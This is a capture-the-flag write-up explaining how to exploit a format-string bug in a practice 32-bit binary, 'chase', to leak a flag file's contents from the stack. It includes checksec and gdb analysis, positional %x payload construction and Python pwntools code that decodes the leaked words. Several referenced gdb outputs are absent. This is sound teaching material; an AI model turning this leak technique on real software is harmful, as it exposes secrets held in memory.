chase

Leaking data off the stack using format strings.

This is an exciting binary. It has no canary and no PIE, but it reads input with a bounded call to fgets(), so we still can't smash the stack. What can we do?

First Observations

The first thing we notice is that the program does nothing when we run it. We'll see later that the binary checks for a file called flag.txt in the same directory and stops execution if it is missing. We can create a dummy file to get around this. I use the same flag every time:

echo flag{temporary_flag} > flag.txt

This writes flag{temporary_flag} into the flag file. I use this value (1) because it's sufficiently long and looks like a flag I might see, and (2) because it has the flag braces, so I can easily find it in memory.

With that out of the way, we can now run the binary. It asks for some input and prints it back to us. Let's dive deeper and check for vulnerable code.

Static Analysis

We can use checksec to see what protections are enabled on the binary:

$ checksec chase
[*] '/home/joybuzzer/Documents/vunrotc/public/03-formats/chase/src/chase'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

As expected, there's nothing super shocking here. No canary, PIE disabled, NX enabled. Shellcode is off the table, but buffer overflows aren't yet.

Checking gdb, we make the following observations:

  • The only user-defined function appears to be main().

  • main() calls several interesting functions. The most important of these are fopen(), fgets(), puts(), and printf().

  • There is a call to exit(), but we can assume, based on earlier findings, that this is because the binary checks for the flag file's existence.

Let's try to break this code down and reassemble what the C code might look like.

Reassembling the Disassembly

Our first significant call is to fopen(). Based on the man pages, we know that fopen() takes two arguments:

  1. The path name of the file to open

  2. The mode to open the file (typically read/write, bytes/chars, etc.)

Using gdb, we can check the arguments:

GEF, a gdb extension, will guess the arguments for us:

If we didn't have GEF, we could check the stack:

fopen() returns a FILE*, which is eventually stored on the stack at ebp-0xc. There's a check afterward to make sure that its value is not NULL, but we can ignore that for now.

The next call is to fgets(). We can check the arguments in the same way:

This isn't super helpful to us. We know that fgets() takes three arguments:

  1. The buffer to read into (in this case, 0xf7ffda40)

  2. The number of bytes to read (in this case, 0x64 or 100 bytes)

  3. The file to read from (in this case, 0x0804d1a0)

The first and third ones make little sense until we check the assembly.

The first parameter is the address of ebp-0x70, which is where we are writing. The second argument is clearly 0x64. The third argument is the value at ebp-0xc, which is the FILE* from fopen().

None of the puts() calls are really important to us, so we're going to skip those. Then we reach the second fgets() call.

The first argument is the address of ebp-0xd4, which is where we are writing. The second argument is clearly 0x64. The third argument is the value at ebx-0x4.

We see that the third argument is stdin, which makes sense because we've been looking for a function that takes keyboard input.

Last, we see that there is a call to printf(). We can check the arguments in the same way:

We see that the string we just read in is passed to printf() as its first argument, so our input is used as the format string itself. This is the format string bug: any conversion specifiers we type are interpreted by printf().

Based on all this information, we can reassemble the C code (at least the important parts):

Exploitation

We know that the flag is being loaded on the stack. It's our job to use the format string bug to find where it is. Without gdb, this would be a very annoying challenge.

We can use gdb to find the flag. If we set a breakpoint right before the fgets() call that reads from stdin, we can see what's on the stack at the point where we enter our format string.

This is why we use flag{temporary_flag} as the contents of flag.txt. The four bytes of flag, read as a little-endian word, are 0x67616c66. We see that it starts at 0xffffd568, which we can verify:
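As a quick sanity check on that constant, the four ASCII bytes of flag can be unpacked as a little-endian 32-bit word. This is a minimal sketch using only Python's standard struct module; the variable names are illustrative.

```python
import struct

# The first four bytes of the dummy flag, in the order they sit in memory.
marker = b"flag"

# "<I" means little-endian unsigned 32-bit integer, which matches how a
# word is displayed on this i386 target.
(word,) = struct.unpack("<I", marker)

print(hex(word))  # 0x67616c66
```

The bytes appear reversed inside the word (0x67 is g, 0x66 is f), which is why the leaked words need to be flipped later on.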

We count that this starts at the 30th word on the stack. We can verify this using the format specifier in our input:

Counting onward, the flag occupies words 30 through 36.
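The offsets from the static analysis give a way to cross-check this count. The sketch below assumes that the buffer at ebp-0x70 is the one seen at 0xffffd568 and that the flag really is positional argument 30; from those it works out where our own input buffer (ebp-0xd4) should appear. The resulting index is a prediction under those assumptions, not something observed in this write-up.

```python
WORD = 4  # bytes per stack word on i386

flag_addr = 0xFFFFD568   # address where the flag was seen in gdb
flag_off = 0x70          # flag buffer lives at ebp-0x70
input_off = 0xD4         # stdin buffer lives at ebp-0xd4
flag_index = 30          # positional index counted for the flag

# Recover ebp from the flag buffer, then locate the input buffer.
ebp = flag_addr + flag_off
input_addr = ebp - input_off

# Distance between the two buffers, in stack words.
gap_words = (flag_addr - input_addr) // WORD

# The input buffer sits below the flag, so its index is smaller.
input_index = flag_index - gap_words

print(hex(input_addr), gap_words, input_index)  # 0xffffd504 25 5
```

If the assumptions hold, an input such as AAAA%5$x should echo 41414141 after the As. The gap between the buffers is also 0x64 bytes, the same limit passed to fgets(), which is consistent with the read not being able to overflow into the flag.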

Python Processing

Rather than doing this manually, we want to process the data to print out the flag easily. Let's see what this looks like.

The first thing we want to do is build the payload. Rather than typing it manually, we can have Python f-strings build it for us.

This code cycles idx from 30 through 36 (range excludes its end value, so the end argument is one past the last index). It then uses an f-string to put the index in the right place (e.g. %30$x). Because f-strings produce str objects and cannot be used with bytes literals, we have to use .encode() to convert each piece to bytes. Then, we append it to our payload.
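The loop described above might look like the following. This is a reconstruction from the description rather than the original listing; the bounds 30 and 37 follow from the word range counted earlier.

```python
payload = b""

# range(30, 37) yields 30, 31, ..., 36; the end value is excluded.
for idx in range(30, 37):
    # f-strings only produce str, so each piece is encoded to bytes
    # before being appended to the payload.
    payload += f"%{idx}$x ".encode()

print(payload)
```

The trailing space after each specifier is what lets the output be split into words later. At 42 bytes, the payload also fits comfortably inside the 0x64-byte limit that fgets() enforces.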

Next, we send off the payload and receive the data:

Now, we need to process the data. Let's do this one step at a time:

  • We know the data is in word-sized chunks, delimited by spaces.

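  • Each chunk represents four bytes written as up to eight hex characters, so every pair of hex characters needs to be converted to one byte.

  • Each chunk is printed as an integer that was read from little-endian memory, so its bytes come out in reverse order. Once we have the bytes, we need to reverse them.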
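The three steps can be traced on sample data. The hex words below were worked out by hand from the dummy flag flag{temporary_flag}; they stand in for real program output, and the names data, words, raw, and chunks are illustrative.

```python
import binascii

# Stand-in for the leaked line (derived from the dummy flag, not captured
# from the binary).
data = b"67616c66 6d65747b 61726f70 665f7972 7d67616c"

# Step 1: split the line into word-sized chunks on whitespace.
words = data.split()

# Step 2: turn every pair of hex characters into one byte.
# %x drops leading zeros, so pad each chunk back to eight characters.
raw = [binascii.unhexlify(w.rjust(8, b"0")) for w in words]

# Step 3: reverse each word to undo the little-endian byte order.
chunks = [r[::-1] for r in raw]

flag = b"".join(chunks).decode()
print(flag)  # flag{temporary_flag}
```

Before the reversal, the first word decodes to b"galf", which makes the byte-order problem easy to see.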

This will print our flag! We can do this entire process in one big step:
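A compact version might look like this. It is a sketch built from the description that follows, wrapped in a hypothetical print_flag helper so it can be run on sample data; the sample words are derived from the dummy flag rather than captured from the binary.

```python
import binascii


def print_flag(data: bytes) -> None:
    """Decode space-separated little-endian hex words and print them."""
    data_arr = data.split()
    for word in data_arr:
        # unhexlify -> bytes, [::-1] -> fix byte order, decode -> str.
        print(binascii.unhexlify(word)[::-1].decode(), end="")
    print()  # finish the line once every word has been printed


print_flag(b"67616c66 6d65747b 61726f70 665f7972 7d67616c")
```

Two caveats apply to this short form: binascii.unhexlify raises an error on an odd number of hex characters, which happens when %x drops a leading zero, and .decode() raises on bytes that are not valid text, which can happen in the words past the end of the flag.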

Let's think about it:

  • For each item in the split data (i.e. data_arr), it's using binascii.unhexlify to convert the data from a hex string to a byte string.

  • From there, we are reversing the data (i.e. [::-1]) and converting it to a string (i.e. .decode()).

  • Finally, we are printing the data without a newline (i.e. end=''). This way, we don't even have to store the data and then worry about using ''.join().

Here is the full exploit:
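What follows is a hedged reconstruction and not the original listing. It assumes pwntools is installed, that the binary is at ./chase, and that the echoed format string is the last line the program prints; the helper names build_payload, decode_words, and run_exploit are hypothetical.

```python
import binascii


def build_payload(start: int = 30, stop: int = 37) -> bytes:
    """Return b'%30$x %31$x ... ' for positional arguments start..stop-1."""
    return b"".join(f"%{idx}$x ".encode() for idx in range(start, stop))


def decode_words(line: bytes) -> str:
    """Turn space-separated hex words into text, undoing little-endian order."""
    out = b""
    for word in line.split():
        # %x drops leading zeros; pad so unhexlify sees whole bytes.
        out += binascii.unhexlify(word.rjust(8, b"0"))[::-1]
    # Bytes past the end of the flag may not be valid text.
    return out.decode(errors="replace")


def run_exploit(path: str = "./chase") -> str:
    """Assumed flow: send the payload, read all output, decode the last line."""
    # pwntools is imported here so the two helpers above work without it.
    from pwn import process

    p = process(path)
    p.sendline(build_payload())
    lines = p.recvall().splitlines()
    return decode_words(lines[-1])
```

Calling print(run_exploit()) from the directory that holds chase and flag.txt should print the flag, possibly followed by a few stray characters from the words after it. If the binary prints anything after the echoed input, the lines[-1] selection would need adjusting.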
